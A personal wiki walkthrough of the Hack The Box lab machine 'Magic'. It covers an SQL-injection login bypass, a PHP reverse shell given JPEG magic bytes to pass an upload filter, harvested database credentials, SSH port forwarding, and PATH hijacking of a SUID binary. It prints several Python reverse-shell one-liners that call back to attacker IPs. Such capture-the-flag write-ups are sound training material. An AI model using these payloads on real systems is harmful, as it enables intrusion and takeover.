HTB Magic - lmiyasato/lenny-hacking GitHub Wiki

1. index.html & index.php show different pages.

   Sql injection / php login bypass; cheat sheet located: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/

   An SQL injection is a computer attack in which malicious code is embedded in a poorly-designed application and then passed to the backend database. The malicious data then produces database query results or actions that should never have been executed

   Because of operator precedence, the AND condition is evaluated first. Then the OR operator is evaluated, making the WHERE clause true. In fact, the condition will be true for all rows of the users table. It means that the provided username is ignored and the attacker will be logged in as the first user in users table. It also means that the attacker does not have to know a username to gain access to the system; the query will find one for him! Now let's see how the attacker can choose which account he will log into. So in this case it is asking to compare admin or 1=1

   Login page: http://10.10.10.185/login.php

   admin' or '1'='1

2. Upload shell (But gotta bypass filter thingy)

   Microsoft's 10 immutable laws of security: https://www.fluidnets.com/2016/03/microsoft-s-ten-immutable-laws-of-security-version-2-0/ Law #4: If you allow a bad guy to run active content in your website, it's not your website any more.

   Load “no-magic” php file and legit dog.jpg file, then magic file.

   webshells overview: https://en.wikipedia.org/wiki/Web_shell
   Magic Number / file signatures overview: https://en.wikipedia.org/wiki/List_of_file_signatures

   A webshell allows a user to access a remote computer via the World Wide Web using a web browser on any type of system, whether it's a desktop computer or a mobile phone with a web browser, and perform tasks on the remote system. No command-line environment is required on either the host or the client.

   Show tweaked php reverse shell using hexeditor: tweak php reverse shell to add in magic number of “FF D8 FF DB” into first 4 bytes using hexeditor

Right click on the image in the libarry to get the URL of the shell.

http://10.10.10.185/images/uploads/malicious.php.jpeg

Got foothold - sudo nc -nvlp 666 uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off

• If disconnected, need to re-load php file?

3. Get User.

Found some mssql creds: (Enumerate db.php5 file) $cat /var/www/Magic/db.php5

private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

Since the mysql command doesn't work on the host, need to do a ssh forward into the target.

create the ssh key on the target:

ssh-keygen
import id_rsa.pub into authorized_hosts    

This new public key needs to be entered in our Kali host’s authorized_keys file for the kali user, but with some restrictions. To avoid potential security issues we can tighten the ssh configuration only permitting access coming from the WordPress IP address (note that this will be the NAT IP since this is what Kali will see and not the IP of the actual WordPress host).

Next, we want to ignore any commands the user supplies. This can be done with the command option in ssh. We also want to prevent agent and X11 forwarding with the no-agent-forwarding and no-X11-forwarding options.

This entry allows the owner of the private key (the web server), to log in to our Kali machine but prevents them from running commands and only allows for port forwarding.

ssh -f -N -R 1122:10.10.10.185:22 -R 13306:127.0.0.1:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking"=no -i /tmp/id_rsa [email protected]

*Note, the 127.0.0.1 is there because it is connecting to the LO interface on the target

ps -ef |grep root cat /var/log/auth.log |grep theseus cat /var/log/auth.log |grep -v root netstat -plant

4. MySql Database Abuse

login into the target mssql db

mysql --host=127.0.0.1 --port=13306 --user=theseus -p

show databases;
use Magic;
MySQL [Magic]> show tables;
MySQL [Magic]> select * from login
+----+----------+----------------+
| id | username | password       |
+----+----------+----------------+
|  1 | admin    | Th3s3usW4sK1ng |
+----+----------+----------------+

This will get you Theseus / user flag:

Upgrade shell (use Python shell script) As you get into this kind of work, some shells are not stable, not to mention the dreadful feeling when their shell is lost because they run a bad command that hangs and accidentally hit “Ctrl-C” thinking it will stop it but it instead kills the entire connection. https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

su into theseus

5. Privilege Escalation / Process snooping / Search path abuse Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

show pre-compiled output of linpeas, -rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo -- Command shows able to run as root, but with user priv's

wget pspy tool: (simulate output of linpeas tool due to time and not to break the shell) pspy is a command line tool designed to snoop on processes without needing root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of linux systems in CTFs.

Create second theseus shell on port 778 to run pspy python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.31",778));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Abusing search orders

Having ‘.’ in your PATH means that the user is able to execute binaries/scripts from the current directory. To avoid having to enter those two extra characters every time, the user adds ‘.’ to their PATH. This can be an excellent method for an attacker to escalate his/her privilege.

the sysinfo command will runas root, then will run other commands such as fdisk

wget fdisk script and put it into /tmp chmod +x fdisk

One logged in theseus, load another script that will get you the python shell script, name it fdisk and put it in /tmp

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.20",888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

wget fdisk script and put it into /tmp

Modify the path search order so it will look up $PATH first export PATH=/tmp:$PATH chmod +x /tmp/fdisk

rerun the sysinfo command